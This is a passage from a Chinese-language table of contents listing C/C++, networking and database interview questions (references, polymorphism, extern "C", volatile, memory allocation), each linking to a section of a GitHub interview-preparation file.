引用占用内存空间吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#532%E5%BC%95%E7%94%A8%E5%8D%A0%E7%94%A8%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E5%90%97) ##### [15.7.5 三目运算符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#533%E4%B8%89%E7%9B%AE%E8%BF%90%E7%AE%97%E7%AC%A6) ##### [15.7.6 指针数组和数组指针的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#534%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84%E5%92%8C%E6%95%B0%E7%BB%84%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.7.7 左值引用与右值引用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#535%E5%B7%A6%E5%80%BC%E5%BC%95%E7%94%A8%E4%B8%8E%E5%8F%B3%E5%80%BC%E5%BC%95%E7%94%A8) ##### [15.7.8 右值引用的意义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#536%E5%8F%B3%E5%80%BC%E5%BC%95%E7%94%A8%E7%9A%84%E6%84%8F%E4%B9%89) ##### [15.7.9 什么是面向对象(OOP)?面向对象的意义?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#537%E4%BB%80%E4%B9%88%E6%98%AF%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1oop%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%9A%84%E6%84%8F%E4%B9%89) ##### [15.8.1 解释下封装、继承和多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#538%E8%A7%A3%E9%87%8A%E4%B8%8B%E5%B0%81%E8%A3%85%E7%BB%A7%E6%89%BF%E5%92%8C%E5%A4%9A%E6%80%81) ##### [15.8.2 什么时候生成默认构造函数(无参构造函数)?什么时候生成默认拷贝构造函数?什么是深拷贝?什么是浅拷贝?默认拷贝构造函数是哪种拷贝?什么时候用深拷贝?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#539%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%97%A0%E5%8F%82%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%9F%E6%88%90%E9%BB%98%E8%AE%A4%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%BB%80%E4%B9%88%E6%98%AF%E6%B7%B1%E6%8B%B7%E8%B4%9D%E4%BB%80%E4%B9%88%E6%98%AF%E6%B5%85%E6%8B%B7%E8%B4%9D%E9%BB%98%E8%AE%A4%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%98%AF%E5%93%AA%E7%A7%8D%E6%8B%B7%E8%B4%9D%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%A8%E6%B7%B1%E6%8B%B7%E8%B4%9D) ##### [15.8.3 构造函数和析构函数的执行顺序?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#540%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E9%A1%BA%E5%BA%8F) ##### [15.8.4 虚析构函数的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#541%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [15.8.5 细看拷贝构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#542%E7%BB%86%E7%9C%8B%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [15.8.6 C++的编译环境](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#543c%E7%9A%84%E7%BC%96%E8%AF%91%E7%8E%AF%E5%A2%83) ##### [15.8.7 Most vexing parse](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#544most-vexing-parse) ##### [15.8.8 STL 六大组件](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#545stl-%E5%85%AD%E5%A4%A7%E7%BB%84%E4%BB%B6) ##### [15.8.9 stack 中有 pop() 和 top() 方法,为什么不直接用 pop() 实现弹出和取值的功能?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#546stack-%E4%B8%AD%E6%9C%89-pop-%E5%92%8C-top-%E6%96%B9%E6%B3%95%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E7%9B%B4%E6%8E%A5%E7%94%A8-pop-%E5%AE%9E%E7%8E%B0%E5%BC%B9%E5%87%BA%E5%92%8C%E5%8F%96%E5%80%BC%E7%9A%84%E5%8A%9F%E8%83%BD) ##### [15.9.1 map 和 unordered_map 的区别?各自的优缺点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#547map-%E5%92%8C-unordered_map-%E7%9A%84%E5%8C%BA%E5%88%AB%E5%90%84%E8%87%AA%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [15.9.2 如何初始化一个指针数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#548%E5%A6%82%E4%BD%95%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [15.9.3 关键字const是什么含意?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#549%E5%85%B3%E9%94%AE%E5%AD%97const%E6%98%AF%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F) ##### [15.9.4 什么是动态特性?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#550%E4%BB%80%E4%B9%88%E6%98%AF%E5%8A%A8%E6%80%81%E7%89%B9%E6%80%A7) ##### [15.9.5 基类的有1个虚函数,子类还需要申明为virtual吗?为什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#551%E5%9F%BA%E7%B1%BB%E7%9A%84%E6%9C%891%E4%B8%AA%E8%99%9A%E5%87%BD%E6%95%B0%E5%AD%90%E7%B1%BB%E8%BF%98%E9%9C%80%E8%A6%81%E7%94%B3%E6%98%8E%E4%B8%BAvirtual%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [15.9.6 在C++ 程序中调用被 C 编译器编译后的函数,为什么要加 extern “C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#552%E5%9C%A8c-%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%AB-c-%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0-extern-c%E5%A3%B0%E6%98%8E) ##### [15.9.7 如何定义Bool变量的TRUE和FALSE的值。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#553%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89bool%E5%8F%98%E9%87%8F%E7%9A%84true%E5%92%8Cfalse%E7%9A%84%E5%80%BC) ##### [15.9.8 内联函数INline和宏定义一起使用的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#554%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0inline%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E8%B5%B7%E4%BD%BF%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [15.9.9 编写my_strcpy函数,实现与库函数strcpy类似的功能,不能使用任何库函数;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#555%E7%BC%96%E5%86%99my_strcpy%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E4%B8%8E%E5%BA%93%E5%87%BD%E6%95%B0strcpy%E7%B1%BB%E4%BC%BC%E7%9A%84%E5%8A%9F%E8%83%BD%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8%E4%BB%BB%E4%BD%95%E5%BA%93%E5%87%BD%E6%95%B0) ##### [16.1.2 完成程序,实现对数组的降序排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#556%E5%AE%8C%E6%88%90%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%AF%B9%E6%95%B0%E7%BB%84%E7%9A%84%E9%99%8D%E5%BA%8F%E6%8E%92%E5%BA%8F) ##### [16.1.3 .ICMP是什么协议,处于哪一层?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#557icmp%E6%98%AF%E4%BB%80%E4%B9%88%E5%8D%8F%E8%AE%AE%E5%A4%84%E4%BA%8E%E5%93%AA%E4%B8%80%E5%B1%82) ##### [16.1.4 C中static有什么作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#558c%E4%B8%ADstatic%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [16.1.5 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#559%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [16.1.6 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#560c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [16.1.7 C++中的什么是多态性? 是如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#561c%E4%B8%AD%E7%9A%84%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81%E6%80%A7-%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [16.1.8 关键字static的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#562%E5%85%B3%E9%94%AE%E5%AD%97static%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.1.9 #define MAX_LEN 500 char arry[MAX_LEN]; cin>>arry; 这段代码有问题吗?若有,请指出并修改;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#563define-max_len-500-char-arrymax_len-cinarry-%E8%BF%99%E6%AE%B5%E4%BB%A3%E7%A0%81%E6%9C%89%E9%97%AE%E9%A2%98%E5%90%97%E8%8B%A5%E6%9C%89%E8%AF%B7%E6%8C%87%E5%87%BA%E5%B9%B6%E4%BF%AE%E6%94%B9) ##### [16.2.1 delete []arry 和 delete arry 一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#564delete-arry-%E5%92%8C-delete-arry-%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E) ##### [16.2.2 多态的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#565%E5%A4%9A%E6%80%81%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [16.2.3 C语言的volatile的含义是什么。使用时会对编译器有什么暗示。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#566c%E8%AF%AD%E8%A8%80%E7%9A%84volatile%E7%9A%84%E5%90%AB%E4%B9%89%E6%98%AF%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E6%97%B6%E4%BC%9A%E5%AF%B9%E7%BC%96%E8%AF%91%E5%99%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%9A%97%E7%A4%BA) ##### [16.2.4 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#567%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [16.2.5 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#568%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.2.6 C语言的volatile的含义是什么。使用时会对编译器有什么暗示。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#569c%E8%AF%AD%E8%A8%80%E7%9A%84volatile%E7%9A%84%E5%90%AB%E4%B9%89%E6%98%AF%E4%BB%80%E4%B9%88%E4%BD%BF%E7%94%A8%E6%97%B6%E4%BC%9A%E5%AF%B9%E7%BC%96%E8%AF%91%E5%99%A8%E6%9C%89%E4%BB%80%E4%B9%88%E6%9A%97%E7%A4%BA) ##### [16.2.7 MFC中CString是类型安全类么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#570mfc%E4%B8%ADcstring%E6%98%AF%E7%B1%BB%E5%9E%8B%E5%AE%89%E5%85%A8%E7%B1%BB%E4%B9%88) ##### [16.2.8 内联函数INline和宏定义一起使用的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#571%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0inline%E5%92%8C%E5%AE%8F%E5%AE%9A%E4%B9%89%E4%B8%80%E8%B5%B7%E4%BD%BF%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.2.9 C++中什么数据分配在栈或堆中,New分配数据是在近堆还是远堆中?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#572c%E4%B8%AD%E4%BB%80%E4%B9%88%E6%95%B0%E6%8D%AE%E5%88%86%E9%85%8D%E5%9C%A8%E6%A0%88%E6%88%96%E5%A0%86%E4%B8%ADnew%E5%88%86%E9%85%8D%E6%95%B0%E6%8D%AE%E6%98%AF%E5%9C%A8%E8%BF%91%E5%A0%86%E8%BF%98%E6%98%AF%E8%BF%9C%E5%A0%86%E4%B8%AD) ##### [16.3.1 DB事务处理的四个特性:](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#573db%E4%BA%8B%E5%8A%A1%E5%A4%84%E7%90%86%E7%9A%84%E5%9B%9B%E4%B8%AA%E7%89%B9%E6%80%A7) ##### [16.3.2 如何初始化一个指针数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#574%E5%A6%82%E4%BD%95%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%95%B0%E7%BB%84) ##### [16.3.3 int i=(j=4,k=8,l=16,m=32); printf(“%d”, i); 输出是多少?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#575int-ij4k8l16m32-printfd-i-%E8%BE%93%E5%87%BA%E6%98%AF%E5%A4%9A%E5%B0%91) ##### [16.3.4 如何在C中初始化一个字符数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#576%E5%A6%82%E4%BD%95%E5%9C%A8c%E4%B8%AD%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [16.3.5 参数传递有几种方式;实现多态参数传递采用什么方式,如果没有使用某种方式原因是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#577%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E6%9C%89%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E5%8F%82%E6%95%B0%E4%BC%A0%E9%80%92%E9%87%87%E7%94%A8%E4%BB%80%E4%B9%88%E6%96%B9%E5%BC%8F%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E4%BD%BF%E7%94%A8%E6%9F%90%E7%A7%8D%E6%96%B9%E5%BC%8F%E5%8E%9F%E5%9B%A0%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.3.6 请填写BOOL , float, 指针变量 与“零值”比较的 if 语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#578%E8%AF%B7%E5%A1%AB%E5%86%99bool--float-%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84-if-%E8%AF%AD%E5%8F%A5) ##### [16.3.7 C++特点是什么,如何实现多态?画出基类和子类在内存中的相互关系。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#579c%E7%89%B9%E7%82%B9%E6%98%AF%E4%BB%80%E4%B9%88%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81%E7%94%BB%E5%87%BA%E5%9F%BA%E7%B1%BB%E5%92%8C%E5%AD%90%E7%B1%BB%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E7%9A%84%E7%9B%B8%E4%BA%92%E5%85%B3%E7%B3%BB) ##### [16.3.8 什么是“引用”?申明和使用“引用”要注意哪些问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#580%E4%BB%80%E4%B9%88%E6%98%AF%E5%BC%95%E7%94%A8%E7%94%B3%E6%98%8E%E5%92%8C%E4%BD%BF%E7%94%A8%E5%BC%95%E7%94%A8%E8%A6%81%E6%B3%A8%E6%84%8F%E5%93%AA%E4%BA%9B%E9%97%AE%E9%A2%98) ##### [16.3.9 触发器怎么工作的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#581%E8%A7%A6%E5%8F%91%E5%99%A8%E6%80%8E%E4%B9%88%E5%B7%A5%E4%BD%9C%E7%9A%84) ##### [16.4.1 C也可以通过精心封装某些函数功能实现重用,那C++的类有什么优点吗,难道仅仅是为实现重用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#582c%E4%B9%9F%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E7%B2%BE%E5%BF%83%E5%B0%81%E8%A3%85%E6%9F%90%E4%BA%9B%E5%87%BD%E6%95%B0%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8%E9%82%A3c%E7%9A%84%E7%B1%BB%E6%9C%89%E4%BB%80%E4%B9%88%E4%BC%98%E7%82%B9%E5%90%97%E9%9A%BE%E9%81%93%E4%BB%85%E4%BB%85%E6%98%AF%E4%B8%BA%E5%AE%9E%E7%8E%B0%E9%87%8D%E7%94%A8) ##### [16.4.2 CSingleLock是干什么的。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#583csinglelock%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%9A%84) ##### [16.4.3 C++中引用和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#584c%E4%B8%AD%E5%BC%95%E7%94%A8%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.4.4 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#585c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [16.4.5 C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#586c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [16.4.6 一般数据库若出现日志满了,会出现什么情况,是否还能使用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#587%E4%B8%80%E8%88%AC%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8B%A5%E5%87%BA%E7%8E%B0%E6%97%A5%E5%BF%97%E6%BB%A1%E4%BA%86%E4%BC%9A%E5%87%BA%E7%8E%B0%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E6%98%AF%E5%90%A6%E8%BF%98%E8%83%BD%E4%BD%BF%E7%94%A8) ##### [16.4.7 C++里面如何声明constvoidf(void)函数为C程序中的库函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#588c%E9%87%8C%E9%9D%A2%E5%A6%82%E4%BD%95%E5%A3%B0%E6%98%8Econstvoidfvoid%E5%87%BD%E6%95%B0%E4%B8%BAc%E7%A8%8B%E5%BA%8F%E4%B8%AD%E7%9A%84%E5%BA%93%E5%87%BD%E6%95%B0) ##### [16.4.8 c++中类和c语言中struct的区别(至少两点)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#589c%E4%B8%AD%E7%B1%BB%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%ADstruct%E7%9A%84%E5%8C%BA%E5%88%AB%E8%87%B3%E5%B0%91%E4%B8%A4%E7%82%B9) ##### [16.4.9 IP组播有那些好处?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#590ip%E7%BB%84%E6%92%AD%E6%9C%89%E9%82%A3%E4%BA%9B%E5%A5%BD%E5%A4%84) ##### [16.5.1 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#591%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.5.2 程序什么时候应该使用线程,什么时候单线程效率高。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#592%E7%A8%8B%E5%BA%8F%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%BA%94%E8%AF%A5%E4%BD%BF%E7%94%A8%E7%BA%BF%E7%A8%8B%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%8D%95%E7%BA%BF%E7%A8%8B%E6%95%88%E7%8E%87%E9%AB%98) ##### [16.5.3 介绍一下模板和容器。如何实现?(也许会让你当场举例实现)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#593%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%B9%E5%99%A8%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B9%9F%E8%AE%B8%E4%BC%9A%E8%AE%A9%E4%BD%A0%E5%BD%93%E5%9C%BA%E4%B8%BE%E4%BE%8B%E5%AE%9E%E7%8E%B0) ##### [16.5.4 以下为WindowsNT下的32位C++程序,请计算sizeof的值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#594%E4%BB%A5%E4%B8%8B%E4%B8%BAwindowsnt%E4%B8%8B%E7%9A%8432%E4%BD%8Dc%E7%A8%8B%E5%BA%8F%E8%AF%B7%E8%AE%A1%E7%AE%97sizeof%E7%9A%84%E5%80%BC) ##### [16.5.5 C语言同意一些令人震惊的结构,下面的结构是合法的吗,如果是它做些什么?inta=5,b=7,c;c=a+++b;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#595c%E8%AF%AD%E8%A8%80%E5%90%8C%E6%84%8F%E4%B8%80%E4%BA%9B%E4%BB%A4%E4%BA%BA%E9%9C%87%E6%83%8A%E7%9A%84%E7%BB%93%E6%9E%84%E4%B8%8B%E9%9D%A2%E7%9A%84%E7%BB%93%E6%9E%84%E6%98%AF%E5%90%88%E6%B3%95%E7%9A%84%E5%90%97%E5%A6%82%E6%9E%9C%E6%98%AF%E5%AE%83%E5%81%9A%E4%BA%9B%E4%BB%80%E4%B9%88inta5b7ccab) ##### [16.5.6 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#596include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.5.7 如何在C中初始化一个字符数组。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#597%E5%A6%82%E4%BD%95%E5%9C%A8c%E4%B8%AD%E5%88%9D%E5%A7%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E6%95%B0%E7%BB%84) ##### [16.5.8 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#598%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [16.5.9 内存的分配方式的分配方式有几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#599%E5%86%85%E5%AD%98%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E7%9A%84%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E6%9C%89%E5%87%A0%E7%A7%8D) ##### [16.6.1 在C++程序中调用被C编译器编译后的函数,为什么要加extern"C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#600%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [16.6.2 如何让局部变量具有全局生命期。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#601%E5%A6%82%E4%BD%95%E8%AE%A9%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%85%B7%E6%9C%89%E5%85%A8%E5%B1%80%E7%94%9F%E5%91%BD%E6%9C%9F) ##### [16.6.3 解释堆和栈的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#602%E8%A7%A3%E9%87%8A%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.6.4 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#603%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [16.6.5 strtok函数在使用上要注意什么问题。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#604strtok%E5%87%BD%E6%95%B0%E5%9C%A8%E4%BD%BF%E7%94%A8%E4%B8%8A%E8%A6%81%E6%B3%A8%E6%84%8F%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [16.6.6 用预处理指令#define声明一个常数,用以表明1年中有多少秒(忽略闰年问题)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#605%E7%94%A8%E9%A2%84%E5%A4%84%E7%90%86%E6%8C%87%E4%BB%A4define%E5%A3%B0%E6%98%8E%E4%B8%80%E4%B8%AA%E5%B8%B8%E6%95%B0%E7%94%A8%E4%BB%A5%E8%A1%A8%E6%98%8E1%E5%B9%B4%E4%B8%AD%E6%9C%89%E5%A4%9A%E5%B0%91%E7%A7%92%E5%BF%BD%E7%95%A5%E9%97%B0%E5%B9%B4%E9%97%AE%E9%A2%98) ##### [16.6.7 说一说C与C++的内存分配方式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#606%E8%AF%B4%E4%B8%80%E8%AF%B4c%E4%B8%8Ec%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F) ##### [16.6.8 你如何理解MVC。简单举例来说明其应用。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#607%E4%BD%A0%E5%A6%82%E4%BD%95%E7%90%86%E8%A7%A3mvc%E7%AE%80%E5%8D%95%E4%B8%BE%E4%BE%8B%E6%9D%A5%E8%AF%B4%E6%98%8E%E5%85%B6%E5%BA%94%E7%94%A8) ##### [16.6.9 在C++程序中调用被C编译器编译后的函数,为什么要加extern“C”声明?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#608%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc%E5%A3%B0%E6%98%8E) ##### [16.7.1 